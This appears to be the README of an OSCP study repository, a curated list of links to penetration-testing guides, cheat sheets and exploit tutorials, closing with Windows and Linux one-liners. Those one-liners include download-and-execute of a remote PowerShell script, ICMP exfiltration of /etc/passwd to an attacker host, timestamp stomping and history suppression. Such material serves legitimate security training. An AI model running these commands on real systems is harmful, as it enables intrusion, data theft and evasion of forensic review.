└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # OSCP-Archives 2 | 3 | During my journey to getting the OSCP, I always come across many articles, Git repo, videos, and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great, I wanted to also build a curated list of the resources that I've collected overtime, all in one area for everyone to access. 4 | 5 | This list will continue to grow over time as I come across new resources. If you know more resources or want me to add yours, please let me know and I'll add it in. 6 | 7 | PS. A VERY big **thank you** to all the authors of these resources, for taking the time and energy putting this invaluable information together. 8 | 9 | ## Enjoy! 10 | 11 | 12 | ### ~ Official Exam Guide ~ 13 | 14 | [`OSCP Certification Exam Guide`](https://support.offensive-security.com/oscp-exam-guide/#exam-restrictions) - **Offensive Security** 15 | 16 | 17 | 18 | ### ~ Reviews and Experiences ~ 19 | 20 | [`31 Days of OSCP Experience`](https://0xdarkvortex.dev/index.php/2018/04/17/31-days-of-oscp-experience/) - **[ParanoidNinja](https://twitter.com/ninjaparanoid)** 21 | 22 | [`Detailed Guide on OSCP Prep – From Newbie to OSCP`](http://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/) - **Ramkisan Mohan** 23 | 24 | [`Offensive Security Certified Professional – Lab and Exam Review`](https://theslickgeek.com/oscp/) - **[theslickgeek](https://twitter.com/theslickgeek)** 25 | 26 | [`Passing The OSCP`](https://pinkysplanet.net/reflection-on-passing-the-oscp/amp/?__twitter_impression=true) - **[Pink_Panther](https://twitter.com/Pink_P4nther)** 27 | 28 | [`OSCP Experience and the first torture!`](https://www.peerlyst.com/posts/oscp-experience-and-the-first-torture-nitesh-shilpkar-osce-oscp-oswp-ceh-crest) - **Nitesh Shilpkar** 29 | 30 | 31 | 32 | ### ~ Helpful VMs for Practice ~ 33 | 34 | [`Kioptrix`](https://sushant747.gitbooks.io/total-oscp-guide/content/) - **[loneferret](https://twitter.com/loneferret)** 35 | 36 | [`OSCP-like Vulnhub VMs`](https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms.html) - **[abatchy](https://twitter.com/abatchy17)** 37 | 38 | [`OSCP Training VM’s hosted on Vulnhub.com`](https://medium.com/@andr3w_hilton/oscp-training-vms-hosted-on-vulnhub-com-22fa061bf6a1) - **Andrew Hilton** 39 | 40 | [`Pinky's Palace CTFs`](https://pinkysplanet.net/tag/ctf/) - **[Pink_Panther](https://twitter.com/Pink_P4nther)** 41 | 42 | [`Hack The Box OSCP-like VMs`](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159) - **[Tony](https://twitter.com/TJ_Null)** 43 | 44 | 45 | 46 | ### ~ CTF Walkthroughs & Educational Videos ~ 47 | 48 | [`Hack The Box CTFs`](https://www.youtube.com/ippsec) - **[ippsec](https://twitter.com/ippsec)** 49 | 50 | [`Search Ippsec's Videos for Specific Topics`](https://ippsec.rocks/#) - **[ippsec](https://twitter.com/ippsec)** 51 | 52 | [`Hack The Box, Over The Wire, Other CTFs`](https://www.youtube.com/derekrook) - **[derekrook](https://twitter.com/derekrook)** 53 | 54 | [`VunHub Walkthroughs`](https://highon.coffee/blog/walkthroughs/) - **[Arr0way](https://twitter.com/Arr0way)** 55 | 56 | 57 | 58 | ### ~ OSCP Prep, Tools, Cheatsheets, Guides, etc. ~ 59 | 60 | [`Metasploit Unleashed`](https://www.offensive-security.com/metasploit-unleashed/) - **Offensive Security** 61 | 62 | [`15 Ways to Download a File`](https://blog.netspi.com/15-ways-to-download-a-file/) - **[NetSPI](https://twitter.com/NetSPI)** 63 | 64 | [`Explain Shell - Great at explaining Linux Commands in Detail`](https://www.explainshell.com/) - **Idan Kamara** 65 | 66 | [`Mixed Archives`](https://blog.g0tmi1k.com/archives/) - **[g0tmi1k](https://twitter.com/g0tmi1k)** 67 | 68 | [`OWASP Testing Guide v4 Table of Contents`](https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents) - **[owasp](https://twitter.com/owasp)** 69 | 70 | [`Penetration Testing Tools Cheat Sheet`](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/) - **[Arr0way](https://twitter.com/Arr0way)** 71 | 72 | [`Reverse Shell Cheat Sheet`](https://highon.coffee/blog/reverse-shell-cheat-sheet/) - **[Arr0way](https://twitter.com/Arr0way)** 73 | 74 | [`Linux Commands Cheat Sheet`](https://highon.coffee/blog/linux-commands-cheat-sheet/) - **[Arr0way](https://twitter.com/Arr0way)** 75 | 76 | [`Reverse Shell Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) - **Pentest Monkey** 77 | 78 | [`Black Room Sec - CTFs, Guides, Tools`](https://www.blackroomsec.com/) - **[blackroomsec](https://twitter.com/blackroomsec)** 79 | 80 | [`Dostoevskylabs's PenTest Notes`](https://dostoevskylabs.gitbooks.io/dostoevskylabs-pentest-notes/content/) - **Dostoevskylabs** 81 | 82 | [`Pentest Compilation`](https://github.com/adon90/pentest_compilation) - **adon90** 83 | 84 | [`SecLists`](https://github.com/danielmiessler/SecLists) - **danielmiessler** 85 | 86 | [`OSCP-Prep`](https://github.com/burntmybagel/OSCP-Prep) - **burntmybagel** 87 | 88 | [`OSCP-Prep`](https://github.com/rhodejo/OSCP-Prep) - **rhodejo** 89 | 90 | [`OSCP Scripts`](https://github.com/garyhooks/oscp) - **garyhooks** 91 | 92 | [`OSCP Scripts & Documents`](https://github.com/ihack4falafel/OSCP) - **ihack4falafel** 93 | 94 | [`OSCP Recon Script`](https://github.com/xapax/oscp) - **xapax** 95 | 96 | [`Cheatsheet-God`](https://github.com/OlivierLaflamme/Cheatsheet-God) - **OlivierLaflamme** 97 | 98 | [`OSCP-Repo`](https://github.com/rewardone/OSCPRepo) - **rewardone** 99 | 100 | [`Cheatsheets`](https://github.com/slyth11907/Cheatsheets) - **slyth11907** 101 | 102 | [`OSCP tricks`](https://hackingandsecurity.blogspot.com/2017/09/oscp-tricks.html) - **WarLord** 103 | 104 | [`Go-For-OSCP`](https://hackingandsecurity.blogspot.com/2017/08/go-for-oscp.html) - **WarLord** 105 | 106 | [`How to prepare for the OSCP ? A STUDY PLAN`](https://www.peerlyst.com/posts/how-to-prepare-for-the-oscp-a-study-plan-magda-chelly-ph-d?utm_source=LinkedIn&utm_medium=Application_Share&utm_content=peerlyst_post&utm_campaign=peerlyst_shared_post) - **Magda CHELLY, CISSP, Ph.D** 107 | 108 | [`OSCP useful Links`](https://backdoorshell.gitbooks.io/oscp-useful-links/content/) - **backdoorshell** 109 | 110 | [`Total OSCP Guide`](https://sushant747.gitbooks.io/total-oscp-guide/content/) - **sushant747** 111 | 112 | [`OSCP Course & Exam Preparation`](https://411hall.github.io/OSCP-Preparation/) - **[411Hall](https://twitter.com/411Hall)** 113 | 114 | [`OSCP Journey: Python Code Challenges`](https://www.peerlyst.com/posts/oscp-journey-python-code-challenges-elias-ibrahim-cissp?utm_source=linkedin&utm_medium=social&utm_content=peerlyst_post&utm_campaign=peerlyst_shared_post) - **Elias Ibrahim** 115 | 116 | [`SMB Enumeration Checklist`](https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html) - **[0xdf](https://twitter.com/0xdf_)** 117 | 118 | [`Tunneling and Pivoting`](https://0xdf.gitlab.io/2018/11/02/pwk-notes-tunneling.html) - **[0xdf](https://twitter.com/0xdf_)** 119 | 120 | [`Tunneling and Port Forwarding`](https://book.hacktricks.xyz/tunneling-and-port-forwarding) - **HackTricks** 121 | 122 | [`Post-Exploitation Windows File Transfers with SMB`](https://0xdf.gitlab.io/2018/10/11/pwk-notes-post-exploitation-windows-file-transfers.html) - **[0xdf](https://twitter.com/0xdf_)** 123 | 124 | [`Multiple Ways to Exploit Tomcat Manager`](https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/) - **[Raj Chande](https://twitter.com/rajchandel)** 125 | 126 | [`PHP Web Shell`](https://github.com/WhiteWinterWolf/wwwolf-php-webshell) - **WhiteWinterWolf** 127 | 128 | [`Msfvenom Cheat Sheet`](https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/) - **[LucianNitescu](https://twitter.com/LucianNitescu)** 129 | 130 | [`Linux Shells`](https://book.hacktricks.xyz/shells/linux) - **HackTricks** 131 | 132 | [`Windows Shells`](https://book.hacktricks.xyz/shells/windows) - **HackTricks** 133 | 134 | [`Dumping Clear-Text Credentials`](https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/) - **Pentestlab** 135 | 136 | [`OSCP Exam Report Template in Markdown`](https://github.com/noraj/OSCP-Exam-Report-Template-Markdown) - **noraj** 137 | 138 | [`OSCP Omnibus`](https://github.com/alexiasa/oscp-omnibus/) - **alexiasa** 139 | 140 | 141 | ### ~ Brute Force ~ 142 | 143 | [`Brute Force - CheatSheet`](https://book.hacktricks.xyz/brute-force) - **HackTricks** 144 | 145 | 146 | 147 | ### ~ Checklists ~ 148 | 149 | [`Checklist - Linux Privilege Escalation`](https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist) - **HackTricks** 150 | 151 | [`Checklist - Local Windows Privilege Escalation`](https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation) - **HackTricks** 152 | 153 | 154 | 155 | ### ~ SQL Injection ~ 156 | 157 | [`Preliminary SQL Injection Part 1`](https://jtnydv.xyz/2018/12/25/preliminary-sql-injection-part-1/) - **Jatin Yadav** 158 | 159 | [`Preliminary SQL Injection Part 2`](https://jtnydv.xyz/2018/12/27/preliminary-sql-injection-part-2/) - **Jatin Yadav** 160 | 161 | [`Informix SQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet) - **pentestmonkey** 162 | 163 | [`MSSQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) - **pentestmonkey** 164 | 165 | [`Oracle SQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet) - **pentestmonkey** 166 | 167 | [`MySQL SQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) - **pentestmonkey** 168 | 169 | [`Postgres SQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet) - **pentestmonkey** 170 | 171 | [`DB2 SQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet) - **pentestmonkey** 172 | 173 | [`Ingres SQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet) - **pentestmonkey** 174 | 175 | [`SQL Injection Reference Library & Techniques`](http://www.sqlinjection.net/what-is/) - **SQLINjection** 176 | 177 | 178 | 179 | ### ~ Linux Privilege Escalation ~ 180 | 181 | [`OSCP - Linux Priviledge Escalation`](https://hackingandsecurity.blogspot.com/2017/09/oscp-linux-priviledge-escalation.html?m=1) - **WarLord** 182 | 183 | [`Basic Linux Privilege Escalation`](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - **[g0tmi1k](https://twitter.com/g0tmi1k)** 184 | 185 | [`Linux Priv escalation`](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) - **carlospolop** 186 | 187 | [`Linux Privilege Escalation`](https://book.hacktricks.xyz/linux-unix/privilege-escalation) - **HackTricks** 188 | 189 | 190 | 191 | ### ~ Windows Privilege Escalation ~ 192 | 193 | [`OSCP - Windows Priviledge Escalation`](https://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html) - **WarLord** 194 | 195 | [`Awesome-Windows-Exploitation`](https://github.com/enddo/awesome-windows-exploitation) - **enddo** 196 | 197 | [`Windows Priv escalation`](https://github.com/kyawthiha7/oscp_notes/blob/master/windows_priv_escalation.md) - **kyawthiha7** 198 | 199 | [`Windows Privilege Escalation Fundamentals`](http://www.fuzzysecurity.com/tutorials/16.html) - **[FuzzySec (b33f)](https://twitter.com/FuzzySec)** 200 | 201 | [`Windows Priv escalation`](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) - **carlospolop** 202 | 203 | [`Windows Local Privilege Escalation`](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation) - **HackTricks** 204 | 205 | 206 | 207 | ### ~ LFI & RFI ~ 208 | 209 | [`PHP Local and Remote File Inclusion (LFI, RFI) Attacks`](https://hackingandsecurity.blogspot.com/2017/09/php-local-and-remote-file-inclusion-lfi.html) - **WarLord** 210 | 211 | [`LFI Cheat Sheet`](https://highon.coffee/blog/lfi-cheat-sheet/) - **[Arr0way](https://twitter.com/Arr0way)** 212 | 213 | 214 | 215 | ### ~ Exploits & Exploit Developtment, Tutorials ~ 216 | 217 | [`Windows & Linux Exploit Development`](http://www.fuzzysecurity.com/tutorials.html) - **[FuzzySec (b33f)](https://twitter.com/FuzzySec)** 218 | 219 | [`Exploit DB`](https://www.exploit-db.com/) - **Offensive Security** 220 | 221 | [`Exploit Development - Starting from Part 1`](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) - **Corelan Team** 222 | 223 | [`Over The Wire - Wargames`](http://overthewire.org/wargames/) - **OverTheWire** 224 | 225 | [`Unix Privilege Escalation Exploits`](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack) - **Kabot** 226 | 227 | 228 | 229 | ### ~ Windows & linux Kernel Exploits ~ 230 | 231 | [`Windows Kernel Exploits`](https://github.com/SecWiki/windows-kernel-exploits) - **SecWiki** 232 | 233 | [`Linux Kernel Exploits`](https://github.com/lucyoa/kernel-exploits) - **lucyoa** 234 | 235 | 236 | 237 | #### **[SecuritySift](https://twitter.com/SecuritySift)** 238 | 239 | [`Windows Exploit Development – Part 1: The Basics`](https://www.securitysift.com/windows-exploit-development-part-1-basics/) 240 | 241 | [`Windows Exploit Development – Part 2: Intro-Stack-Overflow`](https://www.securitysift.com/windows-exploit-development-part-2-intro-stack-overflow/) 242 | 243 | [`Windows Exploit Development – Part 3: Changing-Offsets-and-Rebased-Modules`](https://www.securitysift.com/windows-exploit-development-part-3-changing-offsets-and-rebased-modules/) 244 | 245 | [`Windows Exploit Development – Part 4: Locating-Shellcode-Jumps`](https://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/) 246 | 247 | [`Windows Exploit Development – Part 5: Locating-Shellcode-Egghunting`](https://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting/) 248 | 249 | [`Windows Exploit Development – Part 6: Seh-Exploits`](https://www.securitysift.com/windows-exploit-development-part-6-seh-exploits/) 250 | 251 | [`Windows Exploit Development – Part 7: Unicode-Buffer-Overflows`](https://www.securitysift.com/windows-exploit-development-part-7-unicode-buffer-overflows/) 252 | 253 | 254 | 255 | #### **[shogun_lab](https://twitter.com/shogun_lab)** 256 | 257 | [`Zero Day Zen Garden: Windows Exploit Development - Part 0 [Dev Setup & Advice]`](http://www.shogunlab.com/blog/2017/08/11/zdzg-windows-exploit-0.html) 258 | 259 | [`Zero Day Zen Garden: Windows Exploit Development - Part 1 [Stack Buffer Overflow Intro]`](http://www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html) 260 | 261 | [`Zero Day Zen Garden: Windows Exploit Development - Part 2 [JMP to Locate Shellcode]`](http://www.shogunlab.com/blog/2017/08/26/zdzg-windows-exploit-2.html) 262 | 263 | [`Zero Day Zen Garden: Windows Exploit Development - Part 3 [Egghunter to Locate Shellcode]`](http://www.shogunlab.com/blog/2017/09/02/zdzg-windows-exploit-3.html) 264 | 265 | [`Zero Day Zen Garden: Windows Exploit Development - Part 4 [Overwriting SEH with Buffer Overflows]`](http://www.shogunlab.com/blog/2017/11/06/zdzg-windows-exploit-4.html) 266 | 267 | [`Zero Day Zen Garden: Windows Exploit Development - Part 5 [Return Oriented Programming Chains]`](http://www.shogunlab.com/blog/2018/02/11/zdzg-windows-exploit-5.html) 268 | 269 | 270 | 271 | ### ~ Windows One-Liners ~ **[kindredsec](https://twitter.com/kindredsec)** 272 | *Obtain Permission String from All Services* 273 | 274 | `sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul` 275 | 276 | *Obtain the path of the executable called by a Windows service (good for checking Unquoted Paths* 277 | 278 | `sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul` 279 | 280 | *Forward traffic to an internal host* 281 | 282 | `netsh interface portproxy add v4tov4 listenport=*port* listenaddress=*ip* connectport=*port* connectaddress=*ip` 283 | 284 | *Download and execute a remote PowerShell script (all in-memory)* 285 | 286 | `iex (New-Object Net.Webclient).DownloadString('*remote_file*')` 287 | 288 | *Check the permissions of all binaries associated with services* 289 | 290 | `$list = Get-WmiObject win32_service | select -ExpandProperty PathName | Select-String -NotMatch svchost; foreach ( $path in $list ) { icacls $path 2>null | Select-String -NotMatch "Successfully processed" }` 291 | 292 | *Enable RDP (may also need firewall rule)* 293 | 294 | `reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f` 295 | 296 | 297 | 298 | ### ~ Linux One-Liners ~ **[kindredsec](https://twitter.com/kindredsec)** 299 | *Stomp a timestamp to match other install-time files* 300 | 301 | `touch -a -m -t $(stat -c '%y' /bin/bash | cut -d ":" -f 1,2 | sed 's/[- :]//g') malicious_file.sh` 302 | 303 | *Prevent ran bash commands from being written to a history file* 304 | 305 | `export HISTFILE=/dev/null` 306 | 307 | *Exfiltrate users over ICMP* 308 | 309 | `while read line; do ping -c 1 -p $(echo "$line" | cut -d ":" -f 1,2,3,7 | xxd -ps) my_attacking_host; done < /etc/passwd` 310 | 311 | *Locate mySQL credentials within web files* 312 | 313 | `egrep -ri '(mysql_connect\(|mysqli_connect\(|new mysqli\(|PDO\(\"mysql:)' /var/www/* 2> /dev/null` 314 | 315 | *List all the SUID Binaries on a System* 316 | 317 | `find / -perm -4000 2>/dev/null` 318 | 319 | *Creates iptables rules to transparently route traffic destined to a specific port to an internal host* 320 | 321 | `iptables -t nat -A PREROUTING -i *interface* -p tcp --dport *port* -j DNAT --to-destination *remote_ip_address* & iptables -t nat -A POSTROUTING -o *interface* -p tcp --dport *port* -d *remote_ip_address* -j SNAT --to-source *local_ip_address*` 322 | 323 | *List all running processes being ran by users other than your current one* 324 | 325 | `ps -elf | grep -v $(whoami)` 326 | 327 | *List all system cronjobs* 328 | 329 | `for i in d hourly daily weekly monthly; do echo; echo "--cron.$i--"; ls -l /etc/cron.$i; done` 330 | --------------------------------------------------------------------------------